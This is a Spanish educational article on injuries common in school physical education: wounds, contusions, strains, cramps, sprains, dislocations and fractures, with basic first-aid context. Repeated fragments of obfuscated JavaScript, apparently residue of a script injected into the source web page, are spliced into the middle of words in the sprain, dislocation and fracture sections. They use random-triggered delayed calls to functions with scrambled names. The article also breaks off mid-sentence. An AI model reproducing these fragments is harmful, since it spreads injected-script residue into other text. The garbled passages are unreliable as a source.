LESIONES MÁS COMUNES EN EL ÁREA DE EDUCACIÓN FÍSICA

Autores: Ana María Rangel Berrocal y Antonio Chaves Flores

INTRODUCCIÓN

          El área de Educación Física tiene unas características que la diferencian del resto de áreas que integran la formación del alumno/a. Una muy significativa es que la adquisición de los objetivos, en la mayoría de las ocasiones, se produce gracias al movimiento y al esfuerzo, por lo que ponemos en juego el cuerpo. Al utilizar el cuerpo se pueden producir en nuestras clases lesiones y es muy conveniente para el maestro de Educación Física conocerlas y saber tratarlas teniendo en cuenta que nosotros solo aplicaremos los primeros auxilios y nunca intervendremos en aquello para lo cual no tenemos formación.


LESIONES MÁS FRECUENTES EN EL ÁREA DE EDUCACIÓN FÍSICA.

          Primero vamos a definir “lesión”. Según la Organización Mundial de la Salud podemos decir que es “toda alteración del equilibrio biopsicosocial” y según el Diccionario de la Real Academia de la Lengua Española: “Daño o detrimento corporal causado por una herida, un golpe o una enfermedad”.


Veamos las más frecuentes en el área de Educación Física.

HERIDAS

         Es la lesión de origen traumático, en la que existe pérdida de la continuidad de uno o más tejidos.

Clasificación:

1. Abrasivas: Causadas por fricción o frotamiento con una superficie áspera. Por lo general, sólo dañan tejido cutáneo y subcutáneo, se producen en terrenos irregulares o de superficies duras o ásperas.


2. Cortantes: se pueden producir por implementos deportivos, vidrios, láminas, etc.

3. Punzantes: Heridas provocadas por objetos que presentan punta, como: clavos, varillas, artículos deportivos, etc.

CONTUSIÓN

          Patología traumática-inflamatoria muy frecuente  en las actividades físicas. Las consecuencias de la contusión dependerán del lugar donde se recibió y la intensidad del traumatismo. Su manifestación es a través de dolor, calor y/o tumor, todos estos datos del proceso inflamatorio.


DISTENSIÓN

          Es la lesión microscópica del músculo, que se produce al sobrepasar los límites normales de la elasticidad, produciéndose un estiramiento de las fibras sin que exista un daño anatómico ni ruptura de las mismas, por examen clínico no es demostrable una solución de continuidad del músculo. Su manifestación clínica se caracteriza  por dolor intenso y súbito, el sujeto es capaz de tolerar la molestia y puede continuar su actividad. La evolución de la lesión es rápida y favorable a la mejoría en pocos días.


CONTRACTURA

          Son contracciones musculares dolorosas, de corta duración e involuntarias, causadas por isquemia (irrigación insuficiente del músculo), contusión, desequilibrio hidro-electrolítico, sobrecarga de trabajo muscular, uso de accesorios elásticos o utilización de vendajes muy ajustados. Sus manifestaciones clínicas son: dolor intenso y contracción del músculo afectado.


ESGUINCE

          Los esguinces (torceduras) son lesiones que se producen cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando existe un movimiento forzado de la articulación, más allá de sus límites normales, van desde la distensión hasta ruptura de un ligamento. Los esguinces se dividen según la intensidad de la lesión en:


Grado 1.- Elongación (las fibras solamente se estiran)

Grado 2.- Ruptura parcial (algunas fibras de los ligamentos se rompen)

Grado 3.- Ruptura total (todas las fibras se afectan)

          Sus manifestaciones son: dolor, inflamación e incapacidad funcional  que van desde ligera a importante de acuerdo a la lesión. Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando existe ruptura ligamentaria puede presentarse equimosis leve a severa. En los esguinces grado 2 y 3 hay que tomar en consideración la posibilidad de fractura ósea, por lo cual es necesario corroborar con estudios radiológicos.


LUXACIÓN

          Una articulación está luxada cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando existe la pérdida de la relación normal de las caras articulares, es decir, existe desplazamiento de los huesos fuera de la articulación. Las manifestaciones clínicas son: dolor, incapacidad funcional, deformación y posición anormal de la extremidad afectada. La pérdida de contacto de las caras articulares es sólo posible a consecuencia de lesiones importantes de las zonas blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andas periarticulares, así como de los mismos componentes de la articulación: sinovial, superficies cartilaginosas, cápsula, ligamentos, tendones, músculos, nervios, vasos, que pueden estar comprimidos, pellizcados, desgarrados o arrancados.


FRACTURA

          Es la pérdida de la continuidad ósea, y se distinguen dos tipos principales de fracturas:

1. Fractura cerrada, es aquella en la cual la piel permanece  intacta, si este tipo de fractura se maneja de forma inadecuada      puede agravarse peligrosamente transformándose en abierta o complicada.

2. Fractura abierta, en esta lesión una herida en la piel pone en comunicación el foco de la fractura con el exterior. Este tipo de fractura es grave por el riesgo de infección, exigiendo cuidados especiales.

3. Se habla de una fractura complicada cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}